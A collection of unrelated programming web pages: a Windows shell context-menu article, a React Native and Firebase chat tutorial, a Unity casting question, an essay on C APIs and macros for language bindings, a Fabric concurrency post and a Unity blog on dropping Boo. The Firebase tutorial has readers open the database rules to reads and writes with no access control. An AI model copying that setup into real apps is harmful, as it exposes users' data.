                                                         // we handled WM_INITMENUPOPUP ourselves
    default:
        break;
    }

    // call the original WndProc of the window to prevent undefined behaviour
    // of the window
    return ::CallWindowProc ((WNDPROC) GetProp (hWnd, TEXT ("OldWndProc")),
                             hWnd, message, wParam, lParam);
}

This little function is also very important. Without it, the shell context menu would still show correctly with all the expected menu items, but it would do just nothing if you clicked on an item. So, all this function does is fill a CMINVOKECOMMANDINFO structure, set its lpVerb member to idCommand (the command ID of the clicked menu item), and call IContextMenu's InvokeCommand method, which finally executes the command that belongs to the menu item that was clicked.
void CShellContextMenu::InvokeCommand (LPCONTEXTMENU pContextMenu, UINT idCommand)
{
    CMINVOKECOMMANDINFO cmi = {0};
    cmi.cbSize = sizeof (CMINVOKECOMMANDINFO);
    cmi.lpVerb = (LPSTR) MAKEINTRESOURCE (idCommand);
    cmi.nShow = SW_SHOWNORMAL;

    pContextMenu->InvokeCommand (&cmi);
}

So, that's the whole thing behind the shell context menu. Wasn't that hard, was it? Shell interfaces are not as difficult as they seem at first glance. One problem with them is that they are not well documented in the MSDN. So with a little work and some Google searching, everything's possible. Before I began working with the shell context menu I didn't know much about the Shell. I had used a lot of shell functions like SHGetFileInfo and such, but no real shell interfaces, PIDLs and the like. Now I'd be able to produce a full Windows Explorer alternative with the shell interfaces. That's not a very hard thing to do.

I hope the article is easy to understand, because English is not my native language. On the other hand, it's my first development-related article ever. So hey, I think it's good enough for that. I hope the example project covers CShellContextMenu fairly well, so you'll know how to use it. It also demonstrates how to add custom app-specific menu items to the context menu before it is shown, and shows how to imitate the right-pane listview of Windows Explorer (in a simple way). The active project configuration is set to ANSI compiling, but everything also works in UNICODE mode, which is also included as a project configuration. I'm also considering providing CListCtrl- and CTreeCtrl-derived classes which imitate those in Windows Explorer. But this could still be a long way ahead, because while writing this article I noticed that it's really an exhausting task, harder than actually programming.
There are already two or three articles about that on codeproject.com, but I've noticed that those examples/classes are totally overblown, and therefore their source code is almost impossible to follow and understand.

April 10th, 2003

This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt, please contact the author via the discussion board below. A list of licenses authors might use can be found here.
http://www.codeproject.com/Articles/4025/Use-Shell-ContextMenu-in-your-applications?msg=1259462
Build a Chat App with Firebase and React Native | Jscrambler Blog

In this tutorial, you are going to build a chat application using React Native, Expo, and Firebase as the backend service. The application will contain a simple login system using an email address for each specific user. The user will be allowed to upload a profile picture. The chat application will be more of a global chat room, but it works in real time. You can find the complete source code for this tutorial in the linked repository. To run the app on a simulator:

npm run ios
# for Android
npm run android

Next, install a dependency called react-native-gifted-chat, which provides a customizable UI for a chat application. For navigating between different screens, we are going to use react-navigation, and lastly, to connect with the Firebase project, we need the Firebase SDK.

npm install --save react-native-gifted-chat react-navigation firebase uuid

In order to build the application, we are going to need:

- A user authentication service
- A service to store the user's email
- A service to store the user's avatar image
- A service to store messages

All of these services are going to be leveraged from Firebase.

Setting up Firebase

Firebase is a cloud service by Google that provides an SDK with services like email and social media authentication, a real-time database, a machine learning kit, APIs, and so on. In the application, we are going to use email authentication and cloud storage. To set up a Firebase free-tier project, visit the Firebase Console and create a new project, enter a name, and then click the Create Project button. Next, go to the Develop section, then click on the Sign-in method. Enable authentication using Email/Password and then hit the Save button.

Setup Firebase Database

The next step is to enable the database rules. Visit the second tab, called Database, in the sidebar menu and then select Realtime Database. Then select the second option, Rules, and modify them so that the app can read and write data. That's it for the setup part. In the next section, let us start building the application.
Chat Screen

The react-native-gifted-chat component allows us to display chat messages that are going to be sent by different users. To get started, create a new directory called components. This is where we are going to store all of the components, whether presentational or class-based. Inside this directory, create a new file, Chat.js, with the following code snippet.

import React from 'react';
import { GiftedChat } from 'react-native-gifted-chat';

export default class Chat extends React.Component {
  render() {
    return <GiftedChat />;
  }
}

Now open the App.js file and add logic to create a navigational component using the react-navigation module. This file will contain a stack navigator, and later we will add more screens into the navigator. For now, there is only a chat screen.

import { createStackNavigator } from 'react-navigation';
import Chat from './components/Chat';

export default createStackNavigator({
  Chat: { screen: Chat }
});

Now if you run the simulator device, you will notice that there is a bare-minimum chat screen that has a plain white header and background and, at the bottom of the screen, an input area where the user can enter a message. When typing something, a Send button automatically appears. However, this Send button does not have any functionality right now.

Connecting with the Firebase SDK

Since we have already installed the Firebase SDK dependency in our project, let us now add the other configuration required to connect the React Native app with Firebase. Create a folder called config and inside it a new file, firebaseSDK.js. In this file, add the following keys.
import firebase from 'firebase';

class FirebaseSDK {
  constructor() {
    if (!firebase.apps.length) {
      // avoid re-initializing
      firebase.initializeApp({
        apiKey: '<your-api-key>',
        authDomain: '<your-auth-domain>',
        databaseURL: 'https://<your-db-url>.firebaseio.com',
        projectId: '<your-project-id>',
        storageBucket: '<your-storage-bucket>.appspot.com',
        messagingSenderId: '<your-sender-id>'
      });
    }
  }
  login = async (user, successcallback, failedcallback) => {
    await firebase
      .auth()
      .signInWithEmailAndPassword(user.email, user.password)
      .then(successcallback, failedcallback);
  };
}

const firebaseSDK = new FirebaseSDK();
export default firebaseSDK;

First, to obtain the required keys for the above file, you will have to visit the Firebase console. Click the gear icon next to Project Overview in the left-hand side menu bar and go to the Project settings section. The login function is the business logic that authenticates users who have registered with email and password. It takes two callback functions: one for the case where the user credentials are valid, and another for the case of invalid or unregistered user credentials. Also, in the Authentication screen of your Firebase console, add a test user, since we are going to add a login component before the sign-up one. Create a new component file Login.js inside the components directory with the code you can find here. Import the necessary components from React Native core and the firebaseSDK object. Also, there is going to be an initial state for testing purposes which will contain the same email ID and password that we initialized in the Firebase console in the previous section. In Login.js, also notice that the two methods loginSuccess and loginFailed are the callback arguments that we discussed in the previous section. One of them will be executed. In the above component, we call them by passing the user credentials from the Login button's onPressLogin method.
When running the simulator, you will get the following result. Also note that, if the user is not yet registered in the app, they can directly navigate to the signup screen from the login screen. By clicking the Login button as of now, they will be directed to the chat screen. On entering the wrong password or email ID, an alert box will be shown stating the error message.

Creating the Signup Screen

In this section, you are going to add the functionality for any user to sign up to our chat application, as long as they provide credentials that we store in Firebase. Apart from the email ID and password, we are also going to let users fill in their name and upload an image for an avatar. To create a new account with email and password, along with the user's name and profile image, we add the following to the config/firebaseSDK.js file (note that uploadImage also requires import uuid from 'uuid'; at the top of the file).

createAccount = async user => {
  firebase
    .auth()
    .createUserWithEmailAndPassword(user.email, user.password)
    .then(
      function() {
        console.log(
          'created user successfully. User email:' + user.email + ' name:' + user.name
        );
        var userf = firebase.auth().currentUser;
        userf.updateProfile({ displayName: user.name }).then(
          function() {
            console.log('Updated displayName successfully. name:' + user.name);
            alert('User ' + user.name + ' was created successfully. Please login.');
          },
          function(error) {
            console.warn('Error update displayName.');
          }
        );
      },
      function(error) {
        console.error('got error:' + typeof error + ' string:' + error.message);
        alert('Create account failed. Error: ' + error.message);
      }
    );
};

uploadImage = async uri => {
  console.log('got image to upload. uri:' + uri);
  try {
    const response = await fetch(uri);
    const blob = await response.blob();
    const ref = firebase
      .storage()
      .ref('avatar')
      .child(uuid.v4());
    const task = ref.put(blob);
    return new Promise((resolve, reject) => {
      task.on(
        'state_changed',
        () => {},
        reject, // note the comma: reject is the error callback
        () => resolve(task.snapshot.downloadURL)
      );
    });
  } catch (err) {
    console.log('uploadImage try/catch error: ' + err.message);
  }
};

updateAvatar = url => {
  var userf = firebase.auth().currentUser;
  if (userf != null) {
    userf.updateProfile({ avatar: url }).then(
      function() {
        console.log('Updated avatar successfully. url:' + url);
        alert('Avatar image is saved successfully.');
      },
      function(error) {
        console.warn('Error update avatar.');
        alert('Error update avatar. Error:' + error.message);
      }
    );
  } else {
    console.log("can't update avatar, user is not logged in.");
    alert('Unable to update avatar. You must login first.');
  }
};

From the above file, you can see that uploadImage is the function that allows the user to upload a profile picture. The createAccount function communicates with the Firebase SDK to register the user. The next step is to create the Signup component. Create a new file components/Signup.js and add this code. In this component, we are going to ask the device for permission to access the device's file system and to upload an image. The Expo API has a simple way to request such permissions through Permissions. The ImagePicker component helps the app to select an image, but only if permission to access the file system was granted. It also has advanced methods such as ImageEditor.cropImage that you can leverage to allow the user to crop their profile picture. There is an initial component state that keeps track of all the user information. When the user fills in all the required input fields, the state object in the component also gets updated. To make this work, modify the stack navigator inside the App.js file.
import { createStackNavigator } from 'react-navigation';
import Login from './components/Login';
import Signup from './components/Signup';
import Chat from './components/Chat';

export default createStackNavigator({
  Login: { screen: Login },
  Signup: { screen: Signup },
  Chat: { screen: Chat }
});

In the demo below, as a user you can upload an avatar while signing up, or register a new user account and then log in with that account.

Adding Chat Functionality

As the authentication in our chat application is now working, we can move ahead and add the chat functionality itself. This component is going to need the user information from Firebase in order to create a chat message and send it. Using react-navigation in our project is going to be very useful here: we will use props coming from the login screen to retrieve the user information. There is also a piece of component state to declare that will contain a messages array. Modify the components/Chat.js file accordingly.

import React from 'react';
import { GiftedChat } from 'react-native-gifted-chat'; // 0.3.0
import firebaseSDK from '../config/firebaseSDK';

export default class Chat extends React.Component {
  static navigationOptions = ({ navigation }) => ({
    title: (navigation.state.params || {}).name || 'Chat!'
  });

  state = {
    messages: []
  };

  get user() {
    return {
      name: this.props.navigation.state.params.name,
      email: this.props.navigation.state.params.email,
      avatar: this.props.navigation.state.params.avatar,
      id: firebaseSDK.uid,
      _id: firebaseSDK.uid
    };
  }

  render() {
    return (
      <GiftedChat
        messages={this.state.messages}
        onSend={firebaseSDK.send}
        user={this.user}
      />
    );
  }

  componentDidMount() {
    firebaseSDK.refOn(message =>
      this.setState(previousState => ({
        messages: GiftedChat.append(previousState.messages, message)
      }))
    );
  }

  componentWillUnmount() {
    firebaseSDK.refOff();
  }
}

Now, let us run the application again, either with npm run ios or npm run android.
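One detail in the SDK code worth pausing on is how uploadImage wraps Firebase's event-based upload task in a Promise so it can be awaited. The same pattern can be exercised in plain Node, with no Firebase at all - the fake task object below is invented purely for illustration:

```javascript
// A stand-in for a Firebase storage task: it reports progress, then
// either errors out or completes, via three separate callbacks.
function makeFakeTask(shouldFail) {
  return {
    snapshot: { downloadURL: 'https://example.com/avatar.png' },
    on(event, onProgress, onError, onComplete) {
      setImmediate(() => {
        onProgress(); // some progress happened
        if (shouldFail) onError(new Error('upload failed'));
        else onComplete();
      });
    }
  };
}

// Adapt the callback-based task to a Promise, mirroring uploadImage:
// progress is ignored, the error callback rejects, completion resolves.
function waitForTask(task) {
  return new Promise((resolve, reject) => {
    task.on(
      'state_changed',
      () => {}, // progress handler (unused here)
      reject, // error handler fails the promise
      () => resolve(task.snapshot.downloadURL) // completion handler
    );
  });
}

async function demo() {
  const url = await waitForTask(makeFakeTask(false));
  console.log(url); // https://example.com/avatar.png

  try {
    await waitForTask(makeFakeTask(true));
  } catch (err) {
    console.log('caught: ' + err.message); // caught: upload failed
  }
}

demo();
```

Passing reject directly as the error callback is what lets a failed upload surface as a normal rejected promise, so callers can use try/catch with await instead of wiring up their own error handlers.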
We are running two interfaces of the application in order to demonstrate the chat functionality. The one you will see below is on the iOS simulator, with a user named Alice. If you are building applications with sensitive logic, be sure to protect them against code theft and reverse-engineering with Jscrambler.
http://brianyang.com/build-a-chat-app-with-firebase-and-react-native-jscrambler-blog/
So I am trying to directly cast an instantiated object to my custom component ClickableTile.

TileType tt = tileTypes[tiles[x, y]];
var tile = Instantiate(tt.tileVisualPrefab, new Vector3(x, y, 0), Quaternion.identity) as ClickableTile;
Debug.Log(tile);

This returns null. ClickableTile.cs looks like this and is attached to the prefab:

public class ClickableTile : MonoBehaviour {
    public int tileX;
    public int tileY;
    public TileMap map;

    void OnMouseUp() {
        Debug.Log("Click!");
        map.MoveSelectedUnitTo(tileX, tileY);
    }
}

Why isn't this working? I thought we could cast to any component on the object? This works:

TileType tt = tileTypes[tiles[x, y]];
GameObject tile = (GameObject)Instantiate(tt.tileVisualPrefab, new Vector3(x, y, 0), Quaternion.identity);
ClickableTile ct = tile.GetComponent<ClickableTile>();

Am I missing something?

Answer by jgodfrey · May 21, 2016 at 03:24 PM

I assume your "ClickableTile" script has just been added (as a component) to a standard GameObject that you've turned into a prefab, right? If that's the case, the object you're instantiating isn't a "ClickableTile"; it's a GameObject that has a ClickableTile component attached to it. To get access to the ClickableTile script, you need to instantiate the prefab as a GameObject and then get a reference to the ClickableTile component. So, something like this:

GameObject tile = (GameObject)Instantiate(tt.tileVisualPrefab, new Vector3(x, y, 0), Quaternion.identity);
var ct = tile.GetComponent<ClickableTile>();

Yes, that is the case. I was assuming I could just cast it to a ClickableTile; I am sure I saw something like this in a tutorial I watched earlier. Well, thanks, I guess that clears it up.
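The accepted answer's distinction - a GameObject has a ClickableTile rather than is one, so you look the component up instead of casting - can be sketched outside Unity. The TypeScript below is a purely illustrative analogue of GetComponent<T>(), not Unity API:

```typescript
// Minimal, Unity-free analogue of the GameObject/Component relationship.
class Component {}

class ClickableTile extends Component {
  tileX = 0;
  tileY = 0;
}

class GameObject {
  private components = new Map<Function, Component>();

  addComponent(c: Component): void {
    // Keyed by the component's concrete class.
    this.components.set(c.constructor, c);
  }

  // Like Unity's GetComponent<T>(): look the component up by type;
  // returns undefined when no component of that type is attached.
  getComponent<T extends Component>(ctor: new () => T): T | undefined {
    return this.components.get(ctor) as T | undefined;
  }
}

const tile = new GameObject();
tile.addComponent(new ClickableTile());

// Casting the GameObject itself to ClickableTile would be wrong --
// the GameObject merely *holds* a ClickableTile:
const ct = tile.getComponent(ClickableTile);
console.log(ct instanceof ClickableTile); // true
```

This is why `Instantiate(...) as ClickableTile` yields null in the question: the `as` cast fails because the instantiated object's type really is GameObject, while GetComponent performs a lookup rather than a cast.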
https://answers.unity.com/questions/1190274/why-isnt-this-instantiation-cast-working.html
In which the author attempts to write foreign-language bindings for some commonly available Unix functions.

That is an excerpt from the GNU Manifesto. I assume that it was written around 1985 - I came to the free software party late, having found it by accident while trying to exit from Emacs 18, but that's what the copyright notice on the file says. One Linux-based GNU system later, it's interesting to look at that and see where we are now as against where we were back then. Longer file names? Check. Version numbers? Not supported in any widespread fashion, but CVS is actually preferable for many purposes. Crashproof fs? Journalling filesystems RSN, but even with ext2 I can count on the fingers of one foot the number of times I've actually lost work due to fs corruption. File name completion? Yup. Terminal-independent? Certainly. Lisp? What's that?

Fair question. There are a plethora of high-level languages available in the free software world; Perl and Python both have huge followings, Tcl is still widely used, and Java is inexpensive and widely available (even if the precise status of Java(tm)'s freeness is too complex for me to care enough to know about). Lots of other interesting languages and implementations have Linux-based implementations and active developer communities too - Ruby was featured here on Advogato recently, Caml is pretty popular with the people who know about it, and by the simple act of listing these ones that I can remember I'm opening myself up to vast numbers of responses from people annoyed that I've forgotten their favourite.
So, the stated intention that Lisp be supported everywhere may these days be as relevant as the original intention that GNU support MIT Chaosnet, or be initially targeted at 68k machines, because we have this wide choice of other expressive languages that let us get the job done more quickly than C.

But: systems programming? All of these language implementations - or all that I've seen - are second-class citizens. They're implemented on a C substrate. When you call stat() in Perl, it doesn't make a system call. It calls some C code, and that calls the shared C library, and that makes a system call. The Perl interpreter marshals its arguments and massages them into C calling convention, and the C library insulates us from the kernel-specific details, allowing kernel developers to make changes as necessary when things like 64-bit uids or files bigger than 2Gb come along.

Most of this is basically inescapable. The C library and its friends implement POSIX - or whatever it's called today - whereas the kernel implements whatever it feels like. POSIX is documented. The C calling convention is unlikely to be changed any time soon. Using this sounds like a net win.

Now then. My preferred non-C language implementation on Linux comes with a native-code compiler. I can write code in this language that runs within n% of the speed of C (n == "small enough not to care"). If I use appropriate definitions to describe the C-style functions I want to call, it can generate code which calls them just like that. Inline. No timewasting subroutine calls, no copying stuff around - just get the address using dlsym() or equivalent and jump to it.

There's still a problem with symbolic constants. We can find the address of open() easily enough, but where do we get the value of O_RDONLY? According to the manual page (and I'm assuming from that, POSIX), we should have this value if we #include <sys/types.h>, <sys/stat.h> and <fcntl.h>. OK. Cool.
Now all we need to do is (a) implement cpp, and (b) find out all the symbols that the C compiler has defined when it starts up (echo | gcc -v -E -).

There's another problem with structures. Now we need to implement a complete C parser as well as cpp, and it needs to know the platform's rules for structure packing. Happily neither of these is insuperable, but it gets ugly. We can write an autoconf-ish thing that runs a C program at build time to get all these values from the actual C compiler. Messy, but it works.

OK, we've called the function; it should have opened a file. The return value will tell us, and errno will tell us what went wrong if we didn't. That's an integer, right? Nope. It's a preprocessor macro. Moreover, it's a preprocessor macro which expands into something with leading underscores, which means it almost certainly won't stay like that. How the dickens am I supposed to call that, then? I have to write a C function that returns the value of errno, and call that function every time I want to find out what it's set to. To find a value which was actually returned by the system call, and subsequently squirreled out of sight by the syscall glue, I have to write and call a function.

Do I feel like attention to non-C languages is low on the priority list for libc developers? Yes, maybe I do. My opinion: if you're writing an API - I'd be interested to hear what other issues people have come up against when designing APIs that non-C-language users can use, or in trying to use other people's APIs from non-C languages. Garbage collection and threading are two possible other areas of contention. Discuss.

(Footnote: the language I refer to is of course Common Lisp, and the implementation is CMUCL. More detail on my diary page)

I can certainly see the problems you're facing. I'd like to see the language binding people get together and produce a document that contains guidelines for API designers about how to make life easier.
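Other foreign function interfaces run into exactly this errno wall and solve it the same way: by saving the value immediately after each foreign call. As an illustration (not from the article - Python's ctypes is used here purely as a modern analogue), the use_errno flag does for you precisely the "write a C function that returns errno" trick described above:

```python
import ctypes
import errno
import os

# Load the process's C library. use_errno=True makes ctypes squirrel away
# the thread-local errno right after every foreign call -- the same
# wrapper-function trick described above, baked into the FFI.
libc = ctypes.CDLL(None, use_errno=True)

fd = libc.open(b"/no/such/file", os.O_RDONLY)
err = ctypes.get_errno()

# Note os.O_RDONLY: the symbolic-constant problem is dodged here only
# because Python's build process already extracted the value from the
# C headers for us -- the autoconf-ish approach the article mentions.
print(fd == -1, err == errno.ENOENT)
```

This works because get_errno() reads a copy taken at call time, not the live errno, which the next libc call would otherwise clobber.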
One thing that comes to mind: if you're going to have structures, provide set/get functions to muck with the structure internals. From what I've seen, it's easier for language bindings to deal with functions than with data structure internals.

That said, I want to take your basic argument one step further. I believe that, in nearly all cases, macro expansion is a bad way to get things done. It's seductively easy and relatively powerful, and appears to increase the level of abstraction. However, a lot of the time, it just doesn't work. More specifically, it works well enough for the narrow purpose for which it was originally intended, but fails pretty badly in any broader context.

A particular concern of mine is error reporting. Macro expansion violates one of the main principles of cyberbitchology, which is to catch errors as early as possible. Once you've expanded the macro, you've lost the original context containing the error. Hence, inscrutable error message. Here's a simple example off the top of my head:

#include <glib.h>

int main ()
{
    int i;
    char *p = g_new (i, 1);
}

Try to compile it, and what do you get? "5: parse error before ')'". Not "g_new's first argument must be a type, not a variable". OK, so this isn't very horrifying, so try making a random error in a LaTeX file. Better yet, an autoconf script :)

In addition to error reporting, macros also make analysis of files intractable. In addition to simply being another layer of indirection, it can be difficult to the point of the halting problem to invert what the macros are doing (although I don't think cpp is quite Turing complete, it's still hard). Extensive use of preprocessor macros is also notorious for making debugging hard. This is basically an insoluble problem. The compiled code is the result of macro expansion, but the source the debugger is trying to show you is the input. This is one good reason to use preprocessor macros as sparingly as possible.
Next time you're tempted to use macros to solve a problem, think twice. Have you given up the possibility of clear error reporting? Are there other contexts, such as analysis, for which the macros are making life harder?

Macro systems like that of Lisp don't suffer from the kinds of problems raph describes. That's because the surface syntax is trivial (it's almost impossible to screw up paren matching with a good [read `Emacs'] editor), and the macro-expansion language, being the Lisp language itself, is powerful enough to do any additional error-checking that's required. On the other hand, the Lisp macro system _can_ make complex systems hard to understand if overused. To understand a complex Lisp system, it is widely reported, one must first understand its macrology.

Couple of questions for Raph: Would arguments against macros apply to codes which by necessity have deeply nested, highly iterative loops? For example, shoving function calls into the inner loop of an O(n^3), O(n^4) algorithm tends to degrade performance. On the other hand, writing such functionality explicitly may add several pages of printout to a function already a dozen or more (say) pages long. Using macro expansion increases code readability without sacrificing performance. If such macros were first implemented as functions, exhaustively tested, then turned into macros, what is the harm?

Would arguments against macros apply to codes which by necessity have deeply nested, highly iterative loops?

If that's the only way to do it, that's the only way to do it. However, I would want to ask the obvious questions - Not all of these are necessarily always applicable - you may be targeting users with stupid compilers, for example. But do test first. Premature optimization is the root of all evil, etc etc.

Interestingly, the Plan 9 C Compiler written by Rob Pike accepts a somewhat smaller language than ANSI C.

deeply nested, highly iterative loops?
If that's the only way to do it, that's the only way to do it. However, I would want to ask the obvious questions -

All the documentation I have read concerning inline functions states that inline is a *suggestion* which the compiler is free to ignore at will. I welcome comments to the contrary. (I have Edith Hamilton for mythology.) In the sense that it is possible to compute exactly how many times an arbitrary operation is performed in an algorithm such as GE, why is profiling data relevant?

There are several reasons for macro abuse in the C library. The inability of the C standards committee to use a crystal ball being one highly forgivable case. In general inline is better, but even now gcc's inline isn't always generating such good code as macro tricks, especially with constant evaluation/optimisation tricks.

I am the original author of MlGtk, an interface between Gtk+ and Objective CAML. I would perhaps suggest that APIs be specified in the following fashion:

A nice practical solution to this would be a small library that contains function wrappers for things like the value of errno, and comes with an easily-parseable file format (similar to the GTK+ defs files) that listed symbolic constants and such. Many POSIX language bindings could then use this little library. A similar thing is basically needed for GTK+, except that the functions can go in GTK itself (avoiding the need for the!
http://www.advogato.org/article/39.html
I've been using Fabric to concurrently start multiple processes on several machines. These processes have to run at the same time (since they are experimental processes and are interacting with each other) and shut down at more or less the same time so that I can collect results and immediately execute the next sample in the experiment. However, I was having some difficulties directly using Fabric:

- Fabric can parallelize one task across multiple hosts according to roles.
- Fabric can be hacked to run multiple tasks on multiple hosts by setting env.dedupe_hosts = False
- Fabric can only parallelize one type of task, not multiple types
- Fabric can't handle large numbers of SSH connections

In this post we'll explore my approach with Fabric and my current solution.

Fabric

Consider the following problem: I want to run a Honu replica server on four different hosts. This is pretty easy using Fabric as follows:

from itertools import count
from fabric.api import env, parallel, run

# assign unique pids to servers
counter = count(1, 1)

# Set the hosts environment
env.hosts = ['user@hostA:22', 'user@hostB:22', 'user@hostC:22', 'user@hostD:22']

@parallel
def serve(pid=None):
    pid = pid or next(counter)
    run("honu serve -i {}".format(pid))

Note that this uses a global variable, counter, to assign a unique id to each process (more on this later). What if I want to run four replica processes on four hosts? We can hack that as follows:

from fabric.api import execute, settings

def multiexecute(task, n, host, *args, **kwargs):
    """
    Execute the task n times on the specified host. If the task is
    parallel then this will be parallel as well. All other args are
    passed to execute.
    """
    # Do nothing if n is zero or less
    if n < 1:
        return

    # Return one execution of the task with the given host
    if n == 1:
        return execute(task, host=host, *args, **kwargs)

    # Otherwise create a list of hosts, don't dedupe them, and execute
    hosts = [host] * n
    with settings(dedupe_hosts=False):
        execute(task, hosts=hosts, *args, **kwargs)

# Note the removal of the decorator
def serve(pid=None):
    pid = pid or next(counter)
    run("honu serve -i {}".format(pid))

@parallel
def serveall():
    multiexecute(serve, 4, env.host)

Here, we create a multiexecute() function that temporarily sets dedupe_hosts=False using the settings context manager, then creates a host list that duplicates the original host n times, executing the task in parallel. By parallelizing the serveall task, each host is passed into the task once, then branched out 4 times by multiexecute. Now, what if I want to run 4 serve() and 4 work() tasks with different arguments to each in parallel? Well, here's where things fall apart: it can't be done. If we write:

@parallel
def serveall():
    multiexecute(serve, 4, env.host)
    multiexecute(work, 4, env.host)

Then the second multiexecute() will happen sequentially after the first multiexecute(). Unfortunately there seems to be no solution. Moreover, each of the additional tasks opens up a new SSH connection, and many SSH connections quickly become untenable as you reach file descriptor limits in Python.

Concurrent Subprocess

OK, so let's step back - Fabric is great for one task to one host, so let's continue to use that to our advantage. What can we put on each host that will be able to spawn multiple processes of different types? My first thought was a custom script, but after a tiny bit of research I found a StackOverflow question: Python subprocess in parallel. The long and short of this is that creating a list of subprocess.Popen objects allows them to run concurrently.
By polling them to see if they're done and using select to buffer IO across multiple processes, you can collect stdout on demand, managing the execution of multiple subprocesses. So now the plan is:

- Fabric sends a list of commands per host to pproc
- pproc coordinates the execution of processes per host
- pproc sends Fabric serialized stdout
- Fabric quits when pproc exits

I've created a command line script called pproc.py that wraps this and takes any number of commands and their arguments (so long as they are surrounded by quotes) and executes the pproc functionality described above. Consider the following "child process":

#!/usr/bin/env python3

import os
import sys
import time
import random
import argparse

def fprint(s):
    """
    Performs a flush after print and prepends the pid.
    """
    msg = "proc {}: {}".format(os.getpid(), s)
    print(msg)
    sys.stdout.flush()

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-l", "--limit", type=int, default=5)
    args = parser.parse_args()

    for idx in range(5):
        worked = random.random() * args.limit
        time.sleep(worked)
        fprint("task {} lasted {:0.2f} seconds".format(idx, worked))

This script is just simulating work by sleeping, but crucially, it takes an argument on the command line. If we run pproc as follows:

$ pproc "./child.py -l 5" "./child.py -l 6" "./child.py -l 4"

Then we get the following serialized output:

proc 46145: task 0 lasted 2.68 seconds
proc 46146: task 0 lasted 3.13 seconds
proc 46145: task 1 lasted 0.95 seconds
proc 46144: task 0 lasted 3.70 seconds
proc 46144: task 1 lasted 0.15 seconds
proc 46146: task 1 lasted 1.12 seconds
proc 46145: task 2 lasted 2.90 seconds
proc 46146: task 2 lasted 2.80 seconds
proc 46144: task 2 lasted 3.67 seconds
proc 46146: task 3 lasted 0.59 seconds
proc 46144: task 3 lasted 2.30 seconds
proc 46146: task 4 lasted 2.23 seconds
proc 46145: task 3 lasted 4.65 seconds
proc 46144: task 4 lasted 3.06 seconds
proc 46145: task 4 lasted 4.05 seconds

Sweet!
Things are happening concurrently and we can specify any arbitrary commands with their arguments on the command line! Win! The complete listing of the pproc script is as follows:

Experiments

So what was this all for? Well, I'm running distributed systems experiments, and it's very tricky to coordinate everything and get results. A datapoint for an experiment runs the entire system with a specific workload and a specific configuration for a fixed amount of time, then dumps the numbers to disk.

Problem: For a single datapoint I need to concurrently start up 48 processes: 24 replicas and 24 workload generators on 4 machines. Each process requires a slightly different configuration. An experiment is composed of multiple data points, usually between 40-200 individual runs of samples that take approximately 45-480 seconds each. The solutions I had proposed were as follows:

Solution 1 (by hand): open up 48 terminals and type simultaneously into them using iTerm. Each configuration is handled by the environment of each terminal session. Experiments take about 4-5 hours using this method and it is prone to user error.

Solution 2 (ssh push): use Fabric to parallelize the opening of 48 ssh sessions and run a command on the remote host. Experiment run times go down to about 1.5 hours, but each script has to be written by hand and I am also noticing SSH failures for too many connections at the higher levels; it's also pretty hacky.

Solution 3 (amqp pull): write a daemon on all machines that listens to an amqp service (AWS SQS is $0.40 for 1M requests) and starts up processes on the local machine. This would solve the coordination issue and could even aggregate results, but would require extra coding and involve another process running on the machines.

The solution described in this post would hopefully modify Solution 2 (ssh push) to actually make it tenable.
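The post's full pproc listing was embedded separately and isn't reproduced above. As a rough sketch of the core idea (hypothetical, not the author's code): launch every command up front with subprocess.Popen so they all run at once, then drain their output:

```python
import subprocess
import sys


def pproc(commands):
    """Run each shell command concurrently and return their outputs."""
    # Popen returns immediately, so all children are running at once.
    procs = [
        subprocess.Popen(
            cmd, shell=True,
            stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
        )
        for cmd in commands
    ]
    # Draining in order still overlaps the work: a child that finishes
    # early has its output sitting in the pipe, and a slow child only
    # makes us wait while the others keep running. (A fuller version
    # would use poll() and select() to interleave output as it arrives,
    # as described in the post.)
    return [p.communicate()[0].decode() for p in procs]


if __name__ == "__main__":
    for out in pproc(sys.argv[1:]):
        print(out, end="")
```

This sketch serializes output per process rather than per line; the select-based approach is what gets the interleaved, line-by-line output shown above.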
https://bbengfort.github.io/2017/06/concurrent-subprocesses-fabric/
Documentation, Unity scripting languages and you

Usage of scripts created in the three languages breaks down like this:

This means that, as so few people use Boo, and the resources required to support it in the docs are not negligible, we've decided to drop support for Boo documentation for the Unity 5.0 release and use our resources in a more constructive way. When Unity 5.0 launches, we will also drop "Create Boo Script" from the menu. That said, and very importantly, if your project contains Boo scripts, they will still work just as before.

We have listened to your feedback, and what you've been telling us you really want from your documentation is C# examples across the board. As a consequence, we're also moving internally to provide the best support for C# that we can. Currently, most Tutorials and Sample Assets are based around C#, and in the 5.x cycle, we'll ensure that all our C# examples in the documentation are first-class citizens.

Side note: up until now, our internal procedure has been to write sample code using UnityScript / JavaScript, which is then automatically converted to C# and Boo. We've now made it possible for Unity engineers to author their examples in C# and auto-convert them to UnityScript, using a newly developed and improved C#-to-UnityScript converter. Thus, many of the C# examples you've been requesting are now live, and even more will be ready when Unity 5.0 comes out. W00t!

86 Comments

Mick · October 14, 2014 at 3:58 am

Ahahaha!!! Your picture is awesome, Thiago! About CCR: they're soooo cool! I bought an album in a small music store in Lisboa last summer, with two different versions of Susie Q. One studio version, one live. That song is just amazing. Like the rest of this album. By the way, there's a band not far from Fredrikstad that has made CCR music its specialty. They call themselves CCA Creedence Clearwater Arrival and they're quite good.
Can't measure the original, though.

WazzaM - Lokel Digital · September 26, 2014 at 10:13 pm

I think Unity have made a wise decision by dropping Boo. Likewise, JavaScript and C# are great languages well worth keeping, as has been pointed out by others before me. The genius of Unity's architecture with Mono's implementation of .NET's IL means that supporting multiple languages is easy from a runtime perspective, but it's not free to test, support and document the usage of multiple languages in game development on the Unity engine. Again, dropping Boo, given it is so infrequently used, makes perfect financial sense. Use that energy to make the engine better. I like Python but I found Boo too different to Python to make me want to use it. (Boo is Python-like, if you didn't know that...) There is some confusion in the comments. C# is not C! Not even close! So the comment that C is a 30-year-old language... doesn't help anyone. C# is a merge of C++ keywords sitting on top of Java and Delphi semantics. Apple hasn't dropped C. Guess what most operating systems are written in. C is never, ever going away, but it is increasingly relegated to low-level code (device drivers, core OS). However, that's an entirely irrelevant and futile argument since C has no relationship to Unity whatsoever. Dear Unity, please keep supporting Unity/Javascript as you have, and I'm glad you're raising C#'s profile internally. Personally I find the C# development a bit more precise.

Fattie · September 15, 2014 at 9:45 am

So you're dumping Boo - thank goodness. This article hints you will eventually dump u/s. Quite simply, the longer you wait to do that, the worse it is for everyone.

Wiill · October 9, 2014 at 9:56 am

